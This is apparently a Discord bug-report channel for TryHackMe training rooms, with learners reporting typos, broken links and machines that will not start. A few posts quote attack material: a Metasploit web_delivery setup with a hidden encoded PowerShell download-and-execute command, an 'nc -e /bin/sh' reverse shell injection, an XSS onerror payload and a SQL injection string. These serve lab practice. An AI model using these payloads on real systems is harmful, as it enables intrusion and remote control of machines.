for completeness and for what it's worth, Task 5 is also affected as it expects the filenames without extension, though in fact they are all .txt . Far less of a problem in this case, since we're not searching for them but have them already
#room-bugs
misty kindle
https://tryhackme.com/room/vulnversity
room stuck !
slender sandal
https://tryhackme.com/room/vulnversity
room stuck !
yes it stucks
https://tryhackme.com/room/uploadvuln showing 503 response error
obsidian kiln
https://tryhackme.com/room/uploadvuln showing 503 response error
That would be because the room code is uploadvulns, not uploadvuln
soft terrace
Room: https://tryhackme.com/room/tonythetiger
Task 6
Recommended room (https://tryhackme.com/room/zthlinux) is private and the link to the person returns 404
soft terrace
Might be true but the URL is still in the room
dusky junco
Room: https://tryhackme.com/room/tonythetiger
Task 6
Recommended room (https://t...
Thanks, updating (:
livid escarpBOT
Gave +1 Rep to @soft terrace
soft terrace
Room: https://tryhackme.com/room/linuxfundamentalspart1
In the new linuxfundamentalspart1, 2 and 3 the videos are private
lime yarrow
new linuxfundamentals3 - text about crontab say"0 *12 * * * cp -R /home/cmnatic/Documents /var/backups/"- I am pretty sure that should be */12
also the last cron related question in Task6 (still linux fundamentals 3) say "How frequently does this crontab run" - I guess that should be "cronjob" and not "crontab"
jolly kelp
ZTH: Obscure Web Vulns: Task 16 - grammar mistake
I think it's supposed to be "The interesting thing is"
twin bay
https://tryhackme.com/room/linuxfundamentalspart1 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=kPylihJRG70
https://tryhackme.com/room/linuxfundamentalspart2 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=7Zt2Mp2IeBI
https://tryhackme.com/room/linuxfundamentalspart3 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=bwgaZCb2ft8
thorny kraken
https://tryhackme.com/room/linuxfundamentalspart1
Task 7 I recommend you add something that explains how the & operator is actually used- not being that familiar with it myself I had to experiment to see how you actually use it. A beginner wouldn't know that you're supposed to but it at the end of a command, like my first instinct was to "& command text"
dusky junco
also the last cron related question in Task6 (still linux fundamentals 3) say "...
Thanks -- will update after some lunch (:
livid escarpBOT
Gave +1 Rep to @lime yarrow
dusky junco
https://tryhackme.com/room/linuxfundamentalspart1
Task 7 I recommend you add som...
Good find. Will take a look ty (:
tulip shoal
In Linux Fundamentals Part 3 Task 7 you cant try downloading and installing sublime text because no ROOT access on this task
eternal summit
Well NGL that's a weird answer format
soft terrace
It was already discussed in #room-help and #room-hints
dusky junco
In Linux Fundamentals Part 3 Task 7 you cant try downloading and installing subl...
The task is there an example and it doesn't expect you to install software onto a machine
Re-wrote the question to make this better -- thanks for letting us know!
livid escarpBOT
Gave +1 Rep to @small forge
lime yarrow
Not needed
woven pawn
There seems to be a bug with the WebOSINT room - the republicofkoffee.com domain no longer has its country listed as Panama - instead it is Iceland. The privacy protection service seems to have changed.
terse stump
Hey guys, is anyone else having issues with VMs? I have asked another friends to try the same room and he is also having issues loading VULNERSITY
It was working for my 8 hours ago before bed, but this aFternoon i cant connect with either the attackbox nor my own Kali VM
eternal summit
as in the tryhackme.com page, or webservers on VMs in rooms? @terse stump
terse stump
Ive been having issues which another friend said he was replicating, but the connection is slowly getting better it seems
Canβt understand it. Sometimes it just loads forever, other times it connects, yet a port scan and gobuster scan both work.
And maybe the room is updated since the video was posted, but the method which is described for using intruder does not give a positive for phtml extension to work, doing so manually on the site does give the confirmation, however. Quite frustrating.
steel violet
is the metasploit room working properly
i am not able to gain access to the machine even after doing the exact commands
eternal summit
is the metasploit room working properly
#room-help would be better
ancient sparrow
in linux fundamentals in task two in line 15 you write: SSH allows us to remotely execute commands on another device remotely. I think one of the remotelys can go. really nitpicky, but hey
eternal summit
@dusky junco ^
north gyro
Trying to do the linux fundamentals rooms, just released, when i click start machine the in browser session did'nt appear.
and no credentials are provided to ssh in
wispy geode
that first machine should boot up where the attackbox would usually be, no ssh needed
eternal summit
Yeah, some people are just getting a blank screen there though
eternal summit
Trying to do the linux fundamentals rooms, just released, when i click start mac...
Didn't appear at all?
north gyro
nope
eternal summit
Along the top of the room, near the title, is there a "show split screen" button?
eternal summit
Above that
Near the room title
Around there
CMN, I looooove this formatting with the callouts like that
north gyro
oh derp
north gyro
I didnt see that button
eternal summit
If you minimise a VM, it keeps that state
eternal summit
It's weird and annoying and I'd class it as a UX/usability bug
Have made sure staff are aware
north gyro
It's weird and annoying and I'd class it as a UX/usability bug
Thanks
livid escarpBOT
Gave +1 Rep to @eternal summit
eternal summit
Task 2 cc @dusky junco
This should be plural, not possessive. No apostrophe.
glad badger
`ZTH: Obscure Web Vulns: Task 16` - grammar mistake
Fixed. Thank you for reporting. π
livid escarpBOT
Gave +1 Rep to @jolly kelp
dusky junco
Task 2 cc <@!106094485129162752>
This should be plural, not possessive. No apos...
tyty nice catch
eternal summit
Working through it with pedantic eyes RN for you
dusky junco
π it made quite a few rounds of eyes but yeah -- can never have too many so I appreciate it
dusky junco
in linux fundamentals in task two in line 15 you write: SSH allows us to remotel...
good call (:
eternal summit
π it made quite a few rounds of eyes but yeah -- can never have too many so I a...
You can't navigate into the file
You can navigate into the directory, which would make more sense
dusky junco
I see
eternal summit
Also probably missing a step to go back home after that question
because the next task assumes you're in ~
I'd also add just a quick sentence about how grep is a lot more powerful and is designed around regular expressions
@dusky junco Also highlighted below are the "passwd" and "shadow" files. These two files are special for Linux as they show how your system stores the passwords for each user in encrypted formatting called sha512. Sha512crypt is different and that difference is really important IMO.
I'd ditch the word encrypted and say hashed.
Common Directories (task 6), etc section
/tmp I think it'd be nice to get the word volatile in there somewhere if you're going to compare it to RAM
Linux Fundamentals 3, Task 4, you start talking about Wget then change topic, then later swap back. It'd make sense for them to be all together
Task 5
Would make sense to say how we send those signals with kill?
Also task 5, is it just me or does the font size change randomly?
It's the ^Z, the T is just part of the output
Task 6 - Should probably mention system crontab vs each users individual crontab. Sometimes important for privesc etc.
@dusky junco I'm so sorry
fast plank
I hope this hasn't been reported 1000 times, I searched and didn't find. Linux Fundamentals part 2 Task 5
"important" file is accessible by tryhackme user when I think only intended for after su'ing to user2
dusky junco
I hope this hasn't been reported 1000 times, I searched and didn't find. Linux F...
Thanks. VM is cloning π
livid escarpBOT
Gave +1 Rep to @fast plank
flint plover
In the room "MAL: Researching" on Task 4:
I get the same error still, any workaround for it?
fallen pine
hi so i was doing the osqueryi room and executed everything in order but it errored out!
dusky junco
In the room "MAL: Researching" on Task 4:
I get the same error still, any workar...
Hi. Sorry about this. I'll look to getting a new sample submitted today and replaced within the room π
gleaming shadow
Linux Fundamentals 2, should the important file be world readable?
soft terrace
Room: https://tryhackme.com/room/rppsempire
Task 8
picture is not displayed
also in task 8. Should be WinPEAS and not WinPEASS
glad badger
also in task 8. Should be WinPEAS and not WinPEASS
Fixed. Thank you for reporting. π
livid escarpBOT
Gave +1 Rep to @soft terrace
zealous basin
Hi admin. Finished https://tryhackme.com/room/linuxfundamentalspart1 today. Task 7: Now if I wanted to add "tryhackme" to this file named "passwords" but also keep "passwords123", what would my command be
echo tryhackme >> passwords is correct.
echo tryhackme >> passwords123 is also correct.
Pls verify the bug. Thank you π
high jacinth
echo tryhackme >> passwords123 is also correct.
Answers have some tolerances, THM will accept it I guess. but echo tryhackme >> passwords123 is not correct answer.
zealous basin
Answers have some tolerances, THM will accept it I guess. but `echo tryhackme >...
Noted. The wrong answer was my initial answer. System indicated it was "correct". So I reset the room and keyed "echo tryhackme >> passwords".
untold palm
There's a bug in Osquery > Task 5 Creating queries.
The question asks What is the query to show the username field from the users table where the username is 3 characters long and ends with 'en'?
SELECT username FROM users WHERE username like '%en';
My code above went through, but it didn't take into account that the username needs to also be 3 characters long.
My code marked as correct would only satisfy the username as long as it ends with 'en'.
Also, nowhere in the Osquery documentation did it contain any hints/tips on what syntax to use. I had to get help from the #room-hints channel to figure it out. It would've been best to suggest going to w3schools.com or something similar. The Osquery documentation assumes you are already versed with SQL (which I wasn't), which made it a useless resource.
glad badger
There's a bug in **Osquery **>** Task 5 Creating queries**.
The question asks ...
This is due to answer variance. Not a bug. π
glad badger
Also, nowhere in the Osquery documentation did it contain any hints/tips on what...
Solved and answered in the #site-bugs channel π
wheat fractal
more of an update than a bug: on Kenobi, task 3 question 2, there's 4 now as of two days ago π
fallen pine
hi so i was doing the osqueryi room and executed everything in order but it erro...
please can somebody help ?
verbal sedge
please can somebody help ?
that might be a #room-help question?
fallen pine
that might be a <#522158539129618453> question?
oh ok i asked it here because it was erroring out everytime so i thought it was a big in the room itself
low marsh
Hello, I am doing the "MAL: Malware Introductory" room. For task 7, check MD5 hashes on vlc, aws and netlogo, there are no hashes. I pasted and installed on the VM the 6.0.0.34 version of hashtab, it works now. There is a problem with the installed version.
obtuse musk
Overpass3 -Can't upload Β―_(γ)_/Β―
I'm in the right directory. Restarted the machine. No success. Tried from attack box. No success..
eternal summit
Overpass3 -Can't upload Β―\_(γ)_/Β―
I'm in the right directory. Restarted the mach...
Not a bug. Try somewhere slightly different.
obtuse musk
Not a bug. Try somewhere slightly different.
dammit lol.. Will try, thanks π
livid escarpBOT
Gave +1 Rep to @eternal summit
dusky junco
Hello, I am doing the "MAL: Malware Introductory" room. For task 7, check MD5 ha...
Thanks will get this updated this weekend
livid escarpBOT
Gave +1 Rep to @low marsh
bleak creek
Broken Link
Location URL: https://tryhackme.com/room/owasptop10
Task: Task 2 - Accessing Machines
Issue: The word "here" found in (Follow the guide here to connect using OpenVPN.) sends you to https://tryhackme.com/404
upper stream
anyone knows why i can't access the machine for Linux fundamental part 1
flint plover
Hi. Sorry about this. I'll look to getting a new sample submitted today and repl...
Thank you and bless 
livid escarpBOT
Gave +1 Rep to @dusky junco
viscid carbon
Gd day, anyone having issues entering metasploit room? i can't access it. page forever loading
crimson maple
Hi, I was having the same issue but realized that when you click setting in file hashes it lets you select hash type. Click the box and the hashes should appear. Hope this helps.
dusky junco
Hi, I was having the same issue but realized that when you click setting in file...
I'm swapping out the VM to get this auto-selected right now (: thanks for helping out cc @static holly
livid escarpBOT
Gave +1 Rep to @crimson maple
static holly
Hi, I was having the same issue but realized that when you click setting in file...
Tried that, didn't work for me. When I clicked the small box, the dropdown didn't show me anything
obtuse musk
If I found a typo in one of the roms, is this the place to post?
dusky junco
If I found a typo in one of the roms, is this the place to post?
yess please (:
obtuse musk
In the "Linux Modules" room, under sed. There is a "be" missing. "to BE executed"
dusky junco
In the "Linux Modules" room, under sed. There is a "be" missing. "to BE executed...
Could you share the URL to the room please? I'll update this now if so π
dusky junco
Awesome ty
obtuse musk
I think one line below also there's a "the" missing..
dusky junco
Updated both: To add a script/command that needs to be executed with the / the string pattern
Thanks for reporting @obtuse musk
livid escarpBOT
Gave +1 Rep to @obtuse musk
obtuse musk
In the Linux Modules room under "sed", second question, there's a "the" missing right before "3rd and 4th".
https://tryhackme.com/room/linuxmodules
sterile crater
You are trying to solve task 5 Vulnerable Startup: Broken Authentication 2 inside task 4 Vulnerable Startup: Broken Authentication. The challenge title on your screenshot says Broken Authentication, but it should say Broken Authentication 2. I tested the challenge again on THM and can confirm that it works. The design of it might have been confusing or weird, and I will take that into consideration for any future rooms
atomic pike
Doing Eternal Blue and I found some ... bugs
if we can call them that
RHOST not RHOSTS
Oh nvm
Problem was with the exploit/windows ... It's windows 7, not 8
server is run on windows 7
Also, next task shows us how to upgrade from Shell to Meterpreter, but I got a Meterpreter shell directly
teal barn
You are trying to solve task 5 Vulnerable Startup: Broken Authentication 2 insid...
Thanks for the feedback! I'll try again and pay more attention to the title.
livid escarpBOT
Gave +1 Rep to @sterile crater
wheat prism
did anyone else lose their progress in the linux fundamentals room?
obsidian kiln
Also, next task shows us how to upgrade from Shell to Meterpreter, but I got a M...
Pretty sure it tells you to get a command shell first, for that reason
(It certainly should: I edited it a few months ago)
MSF made Meterpreter the default for it a while back
soft terrace
did anyone else lose their progress in the linux fundamentals room?
The rooms got reworked to be more beginner friendly.
See: #announcements message
wheat prism
The rooms got reworked to be more beginner friendly.
See: https://discord.com/c...
good2know! thanks mate π
livid escarpBOT
Gave +1 Rep to @soft terrace
stark torrent
Not really a bug, but just an error I spotted in Task 3 of John The Ripper room
clever pumice
in Linux Fundamentals1 when i press "Start Machine it start browser machine that gets connection error so i cant do anything in the box
dry epoch
Not really a "Bug" but I found a typo in a beginner room that could cause some confusion to beginners like myself.
dry epoch
Found another typo john the ripper room task 6
https://tryhackme.com/room/johntheripper0
etchashes.txt is the download file for this task.
dry epoch
I don't see the typo in this image?
"python hash-identifier.py" should be "python hash-id.py" as per the wget command above it.
cunning berry
Don't know if would be classified as a bug or not
But the Windows machine in room Blue Teaming The Grinch strikes again! is supppppper slow
I am using RDP via Windows, I have selected the closest VPN server, disabled all the graphic enhancement options when connecting via Windows RDP
and it's been 15+ minutes but the machine is responding very very very slow.
Half of the time I get a blank screen.
Is it normal, or it should'nt happen like this?
facing this issue only for Windows machine, linux boxes works like a charm.
I also got a Windows update pop-up.
thick ruin
Hello, I'm on the Nmap room Task 12 NSE Scripts Searching for Scripts. And I'm stuck on the second question. It seems like there's supposed to be a script it gets linked to, but I don't see a script it should be referencing.
glad badger
Not really a bug, but just an error I spotted in Task 3 of John The Ripper room
Fixed.Thank you for reporting. π
glad badger
https://tryhackme.com/room/johntheripper0 Task 4
Which one is correct?
stark torrent
Which one is correct?
dry epoch
Which one is correct?
@stark torrent is correct hash-id.py
glad badger
<@!125225529480708096> is correct hash-id.py
Fixed. π
dry epoch
@glad badger Did you see the other one I mentioned in the same room?
thick ruin
Hello, I'm on the Nmap room Task 12 NSE Scripts Searching for Scripts. And I'm ...
Nevermind, I needed to read through the script from the first question. Missed the context there.
glad badger
<@!719230703161835633> Did you see the other one I mentioned in the same room?
Fixed too. π₯³
soft terrace
Room: https://tryhackme.com/room/adventofcyber2
Task 10
Error: clicking on "intercepting a request" leads to https://extratechtalk.in/intercept-http-requests-using-burp-suite/ which can't be found anymore
teal barn
https://tryhackme.com/room/johntheripper0 Task 4
Better try Haiti instead of abandoned hash-id or hash-identifier https://noraj.github.io/haiti/#/why
eternal summit
Better try NameThatHash
And understand the fundamental flaws with automated hash identification tools
teal barn
Better try NameThatHash
yeah there are more emoji in the Readme π
misty cave
I was having a look over some of the old rooms and noticed that the https://tryhackme.com/room/kali room has steps that tell you about using the machine in your browser, but they refer to an "Access in browser" button in the "Active Machine information" panel, whereas now you need to use the "Show Split view" button at the top of the page, that is next to help and options.
eternal summit
Woah that's an ancient room
misty cave
819 days, yup, dunno if anyone uses it anymore, but it's shown me https://tryhackme.com/my-machine which i din't know about, so that's a plus
might be worth a revamp π
eternal summit
Certainly should be private now
thick junco
Room: https://tryhackme.com/room/blaster
Task 4
Windows Defender catches the powershell script
eternal summit
...the powershell script?
thick junco
you run the exploit, it gives you a command to type on the target machine's command prompt
something like this: powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAA...
eternal summit
That's... Probably not the intended exploit
At least, you certainly don't need that.
I would certainly not class this as a bug.
If you're getting picked up by defender, you're doing it wrong.
thick junco
urgh can't paste pictures
ok so, I followed the instructions pretty closely and got picked up by defender
I did it once more following the tutorial video, still got picked up by defender
I used multi/script/web_delivery
set the target to PSH
set the payload to windows/meterpreter/reverse_http
set the LPORT to 443
set LHOST and SRVHOST to my IP
then run -j
got the command and just copy-pasted it into the elevated command prompt; nothing happens, the window just disappears
tried again without the -w hidden, and I got
IEX : At line:1 char:1
- If($PSVersionTable.PSVersion.Major -ge 3){ $GPF=[ref].Assembly.GetT ...
-
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:282
- ... edentials;};IEX ((new-object Net.WebClient).DownloadString('http://10 ...
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~- CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
- FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
At line:1 char:1
- function m54v {
-
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
thick junco
stray badge
Hi guys, want to report a possible bug for https://tryhackme.com/room/linuxfundamentalspart3 .
The task is to find the IP address of the user who visited the site from the Apache access logs. However, the provided user itself do not have sufficient permissions to view the file. Not sure if my approach is wrong, but I will attach the screenshots below.
It seems I can't post images, so I have uploaded to imgur. https://imgur.com/a/0s9RxeL
wispy geode
Hi guys, want to report a possible bug for https://tryhackme.com/room/linuxfunda...
it's not a bug, there's two log files
read the other one
wispy geode
It seems I can't post images, so I have uploaded to imgur. https://imgur.com/a/0...
and verify with the bot to be able to post screenshots in the future
!docs verify
tropic flameBOT
TryHackMe
stray badge
Ok, I will try that out. Sorry for missing out the verification process =/ thanks!
wispy geode
no problem
wheat fractal
Can someone please check, if there is a problem with "Daily Bugle", running sqlmap and never seen running it so slowly - practically doesn't even work. Two-three new lines in one hour. Also when clicking on anything the load times are enormously long. I know it's not a problem with my internet, as all other sites are running fast (on fibernet).
wild bramble
@twin tapir solly for ping but https://offsec.red/mimikatz-cheat-sheet/ this site in ur post exp room doesnt work (postexp room)
task 8
potent quartz
can anyone help me in room roysrus im unable to open webserver on port1234
i can open other server on port 80
wild bramble
try some other port like 8080
crude zinc
Hi ! I think we identified a bug in "Blaster" room. When following the steps in the last task, executing a powershell payload generated by MSF for a meterpreter, our shell is killed by Defender (which I understood is supposed to be deactivated).
rough pike
Hello, in the Content Security Policy room, in task 7, the first attack, I tried several payloads that should be working, but when I receive the request in my webhook, the cookies are not showing. I even tried the payload from the writeup (which was similar to mine), and still not working. Does someone know the cause for this problem?
chrome yacht
In the newest room (Linux server forensics) on task 2 and 4 the text isn't "wrapped" in the "viewing area". The text is not fully visible basically, I don't know if it is like that on any other tasks as I've only done up to task 4
jolly kelp
Upload Vulnerabilities, Task 6, Extension Validation paragraph: "so actually don't mean much" <-- incorrect grammar
Should be "so it actually doesn't mean much"
solar kite
Hello! Does anyone know why in the DVWA room, in the Command Injection vulnerability, even on Security Level Low, it won't spawn a reverse shell with 127.0.0.1 && nc -e /bin/sh <IP> <port>? I have already tried with nc -e /bin/bash, and I have tried changing the && to ; and |, but nothing works. All the examples I saw from DVWA spawned the reverse shell in a similar way.
obsidian kiln
@jolly kelp I would say that with the plural extensions and the use of "they" (plural) to refer to them before, "don't" makes most sense there. Neither of them really feel right though
It's saying that the file extensions don't mean much, rather than the whole topic doesn't mean much -- albeit amounting to the same thing
eternal summit
Hello! Does anyone know why in the DVWA room, in the Command Injection vulnerabi...
Netcat with the -e option very very rarely works
The -e option is specific to one version of netcat, and there's several
solar kite
The -e option is specific to one version of netcat, and there's several
Huuum
How do you recommend to proceed? As I said, all the writeups I found use nc -e
eternal summit
Are they writeups for the THM room?
eternal summit
It won't be a bug with the room.
Try different reverse shell payloads.
oak mica
seems to just be Task 2 and the start of Task 4 that has this text wrapping issue
regal cargo
Anyone else having a problem loading into the Vulnversity room?
zealous vortex
Anyone else having a problem loading into the Vulnversity room?
Seems to be more of a site bug than a room bug. Try clearing cache and force-reloading
regal cargo
Seems to be more of a site bug than a room bug. Try clearing cache and force-rel...
So I did the clear cache and reload but still stuck on loading
zealous vortex
Yeah, I'm not sure what else to try or what's causing it. I think it's a known issue, but I don't know the cause or a fix. Sorry :/
regal cargo
Donβt worry about it but thanks for trying to help me π
wise pike
Hello, just thought I'd let you know that the attackbox isn't able to complete Task 3, Enumerating SMB in the Network Services room on the complete beginner path. When running enum4linux on the attackbox targeting the target system, it throws errors that sound like missing dependencies. When using the web based kali machine instead everything works as expected.
steady shuttle
Anyone else having a problem loading into the Vulnversity room?
if you are on windows sometimes the rooms dosen t work ( infinite loading )
you can do it from linux
i m using as main windows and whrn i met this bug i go in linux and see thr room there
soft terrace
Room: https://tryhackme.com/room/linuxserverforensics
Task 2
Error: Sentences are not properly displayed
twin bay
https://tryhackme.com/room/linuxserverforensics - Task 4 - Most of the intro text is cut off -
glad badger
Are you using Chrome? @soft terrace
soft terrace
Are you using Chrome? <@!753559995714502666>
Firefox
glad badger
Interesting. It cuts off in Chrome as well. It displays fine in Safari, but still strange word-splitting.
twin bay
I'm using Chrome
Shouldn't those be some form of standard text element for every room to maintain a consistent style?
The difference in boldness should probably also be a concern :p
soft terrace
to be exact
plush smelt
Is anyone else having issues with the Rust room? I havenβt been able to load it for over a month
Just sits there with the little circle spinning and never loads anything like the questions etc..
viral cobalt
it's a known issue unfortunately
I don't know if there's a known fix
@eternal summit or @green steppe might know?
eternal summit
Hi it's a site issue
viral cobalt
@amber flint site broke plz fix
amber flint
Get help
amber flint
Hi it's a site issue
love your answer lmao
viral cobalt
brb calling papa ashu /s
viral cobalt
name a better duo than rust and breaking things
glad badger
Cry and Spooky
wheat fractal
Machine in Linux Fundamentals Part 1 (https://tryhackme.com/room/linuxfundamentalspart1) not starting
dire sphinx
Disk Analysis & Autopsy
(https://tryhackme.com/room/autopsy2ze0) not strating
wanton stump
anyone else getting error 504 - gateway timeouts when trying to start machines ?
oak mica
yeah currently under investigation - #site-support message
wanton stump
yeah currently under investigation - https://discord.com/channels/52138221629983...
π
dry epoch
Not a linux master but are the underlined in Red suppose to be 'x' instead of 's'?
oak mica
well, it's talking about suid so I don't think so
dry epoch
well, it's talking about suid so I don't think so
ok I get it thank you π
livid escarpBOT
Gave +1 Rep to @oak mica
zealous vortex
Room: https://tryhackme.com/room/beginnerpathintro
Task: 2
Issue: Typo in the right side web page for "Target Hack", 2nd page: (to monitor stores' temperates) should be temperatures
On the 3rd page, "Targets" should be possessive ("Target's")
spark edge
for some reason i cannot open the module in the cyborg room, it shows i have 0% completed the room but the checks marks in the task are green and i cannot see any content on tast 2
i ve tried to open the room with other browsers the result stays the same, and this problem only occurs with my acc
spark edge
you could try the 'reset progress' button for that room
the button is non-responsive for this room, clicking yes please doesn't do anything
oak mica
oh, does indeed sound like a bug then
spark edge
maybe but it did occur with my acc only, i've asked so many people who did or didn't do this room, but everything seems fine for them
oak mica
yeah it loads fine for me, still a bug I guess
spark edge
yeah it loads fine for me, still a bug I guess
hmm
hasty wren
i got some issues with the juice-shop.herokuapp.com site. I can't make a ping and becouse that is imposible the burn suite work.
lapis inlet
the "learn rust' room is not working ,please solve this issue
eternal summit
i got some issues with the juice-shop.herokuapp.com site. I can't make a ping an...
That's not TryHackMe.
Pings are also independent of the web application
cloud obsidian
MImikatz part (Task 21) in the wreath room https://tryhackme.com/room/wreath
Does this mean the network has to be reset?
fresh echo
Hello, the Rust root is in infinite loading (https://tryhackme.com/room/rust)
does anyone manage to access it?
cloud obsidian
Hello, the Rust root is in infinite loading (https://tryhackme.com/room/rust)
same
lapis inlet
+1
glad badger
Disk Analysis & Autopsy
(https://tryhackme.com/room/autopsy2ze0) not strating
Should be working now. π
viral ingot
Serving Files From Your Host - WEB
Ubuntu machines come pre-packaged with python3. Python helpfully provides a lightweight and easy-to-use module called "HTTPServer". This module turns your computer into a quick and easy web server that you can use to serve your own files, where they can then be downloaded by another computing using commands such as curl and wget.
typo on last line should read 'computer'
Room: linux fundamentals 3
green ermine
Serving Files From Your Host - WEB
Ubuntu machines come pre-packaged with pytho...
mod mentioned that it is correct
eternal summit
mod mentioned that it is correct
No
Reporting it in #848213138565365760 would have also been fine
But cc @dusky junco ^^
soft terrace
Not a bug but feedback regarding
Room: https://tryhackme.com/room/linuxfundamentalspart3
Task 6
Many people are confused with the frequency question of the crontab.
Could you add a @ in the answer format so it's more clear how the answer should look like?
twin tapir
Not a bug but feedback regarding
Room: https://tryhackme.com/room/linuxfundament...
Thatβs not possible
toxic compass
I am at linux fundamentals P1 room, and i am getting connection error while starting the provided attackbox in that room.....
eternal summit
- it's not the attackbox, it's a different machine
- it's a known issue atm
toxic compass
1. it's not the attackbox, it's a different machine
2. it's a known issue atm
Ok
So, is there any workarounds?
And sorry, i am new at tryhackme π
eternal summit
You'll need to wait for it to be fixed
toxic compass
You'll need to wait for it to be fixed
K
tropic trench
attacktive directory room, not really working when trying to install kerbrute, the standard attack machine seemed better than the kali one, but still terminal crashes and resets to being brand new like when you start the instance up
twilit fjord
im doing Brainstorm room. but i have an issue with running charserver.exe on my windows vm with imunitty debugger and mona. its a 16bit executable and ntvdm.exe seems to bug so i cant run the chatserver.exe. i didnt find any working fixes. maybe anyone here has a clue
dire sphinx
Should be working now. π
yes thanks
livid escarpBOT
Gave +1 Rep to @glad badger
twilit fjord
Make sure you download it in Binary mode from FTP
thx ill check that out
livid escarpBOT
Gave +1 Rep to @eternal summit
twilit fjord
Make sure you download it in Binary mode from FTP
jep it runs now thx a lot
livid escarpBOT
Gave +1 Rep to @eternal summit
wheat fractal
just seems like incorrect grammar; room https://tryhackme.com/room/nax
glad badger
just seems like incorrect grammar; room https://tryhackme.com/room/nax
Fixed, thank you for reporting π
livid escarpBOT
Gave +1 Rep to @drowsy portal
wind hollow
Room : common linux privesc
task 4
everytime i click this button. it say "undefined" and my anti virus detects a RCE attempt
eternal summit
everytime i click this button. it say "undefined" and my anti virus detects a RC...
Yeah. It's a false positive with BitDefender.
It's crazy it detects it as RCE too, because windows doesn't have /etc/passwd
eternal summit
It's not normal. It's BitDefender being bad at its job.
supple cypress
I may be crazy or not understanding. I am doing Vulnversity, and no matter any attackbox i open, when scanning, squidproxy is never there or running. nor is the webserver on 3333 there. so i cannot move onto task3.
eternal summit
I may be crazy or not understanding. I am doing Vulnversity, and no matter any a...
!docs verify
tropic flameBOT
TryHackMe
eternal summit
Follow those steps, and post a screenshot of what you're doing in #room-help
supple cypress
Sorry for the late reply. i will do that now
maiden pewter
I ran into an issue with steelmountain room for a while. sc in powershell was triggering set-content and not service-control as the room suggested. Thankfully I noticed that files were being created and was able to complete the room by using service-control.
wheat fractal
room https://tryhackme.com/room/catpictures it's pinging just fine but i can't access anything
ftp, or the webserver
zealous vortex
Might also want to ask in #850434990978105384
wheat fractal
got the webserver working, after i leave the room xD..
marsh rose
Hi, Seems there is a typo in the room https://tryhackme.com/room/introtox8664, for the task 4, it mentions aaa while AFAIU it should be aa. (There is also an "empty" command to be run)
obtuse musk
Hi π
in https://tryhackme.com/room/malstrings the actual amount of total transactions doesn't match anymore. The total amount seems to still going up.. The right answer for the 1st question in task 4 is one below the actual one on this site: https://live.blockcypher.com/btc/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94/
marsh rose
Hi, Seems there is a typo in the room https://tryhackme.com/room/introtox8664, f...
Another little typo in Task 5: The next instruction is a jle which is going to check is the value is var-ch is less than or equal to 8. should probably be The next instruction is a jle which is going to check if the value of var-ch is less than or equal to 8.
dusky junco
Hi π
in https://tryhackme.com/room/malstrings the actual amount of total trans...
Hi thank you ((: I'll get this updated and archive it to prevent it in the future
livid escarpBOT
Gave +1 Rep to @obtuse musk
kindred hull
I'm doing the filter evasion section of the Cross-site scripting room, and challenge 3 doesn't seem to take my answer as correct even though it is.
<img src="blah", onerror=alert("H"+"e"+"l"+"l"+"o") / >
I tried the solution from the writeup, which does work, but is not the same way I did it. Not sure if I was too impatient to get the answer popup, but yeah.
wheat fractal
TechIT room is always stooping my rev shell is not receiving data from the room
eternal summit
Is that a public room?
austere ore
Game Zone room server crashes when you do the manual SQL injection
with ' or 1=1 -- -
and it doesnt boot back up, so you have to terminate and reboot it
seems to work on attackbox, so I wonder whats up with my WSL Kali now
I did some other boxes previously and in one walkthrough entered some ufw command that I was not even sure what it did to help me advance, since then I've removed ufw from my system
but I cant seem to access shit now
ifconfig shows many tun interfaces, more than there was previously
like 4, zero through 3
eternal summit
#site-support would be better as this isn't a bug with the room
austere ore
gotcha
austere ore
found the issue, I had 2 openvpn processes running, oops
restive sparrow
Hi i think the authenticate room has some errors with the json web token exploitation. i have been trying to follow the walkthrough for the past hour and the only token that works is the one provided for admin, if you try and get user2 it keeps giving an error
soft terrace
Room: https://www.tryhackme.com/room/xss
Task 9
Image is not properly displayed
vapid quartz
https://tryhackme.com/room/networkservices
telnet is not running any command (ping)
.RUN ping ... is now showing anything, server hangs without any further message
glad badger
Room: https://www.tryhackme.com/room/xss
Task 9
Image is not properly displayed
I've added it to the list. π
kindred hull
In the Powershell Scripting room, the first question asks for the location of "interesting-file.txt", when the file name on the machine is interesting-file.txt.txt
wheat fractal
fair warning, the same will happen for different files throughout the room, be on the lookout
kindred hull
good to know, just spent like 20 minutes trying to figure out what was wrong with my syntax because I was using the full name of the file, until I just decided to *.txt
wheat fractal
same here π
next hare
In the Mal: Strings room task 4, the # of the btc transactions has gone up by one
dusky junco
In the Mal: Strings room task 4, the # of the btc transactions has gone up by on...
Resolved, thanks for reporting (:
livid escarpBOT
Gave +1 Rep to @next hare
next hare
No prob bro beans thanks for the room
dusky junco
Much appreciated 
wheat fractal
Room: https://tryhackme.com/room/thatstheticket
Bug: Typo
Sentence: "We not not recognise that email"
@tepid moon thought it'd be best to ping you.
glad badger
A Not Not is like an At-At from The Empire Strikes Back. π
wheat fractal
vocal cairn
well this is fun, I am not allowed to login as admin in Corp, I have tried both "runas" and RDP, runas tells me there are some issues with the admin user and running RDP tells me to change the password.. but after chainging the password it crashes on me...
eternal summit
Didn't crash on me last time I changed the password. The password's expired which is the issue
vocal cairn
Yup, I reset the box and it didn't crash after I changed the password.
sonic tapir
The SMB server on the Attactive Directory seems to be malfunctioning
eternal summit
The SMB server on the Attactive Directory seems to be malfunctioning
You should not have four forward slashes?
It's either //ip//share or \\\\ip\\share when you're on Linux
tiny ginkgo
I think this is a problem with the task question itself. I tried verifying it with my browser by sending a get request and the server responded same what nessus reported
jolly socket
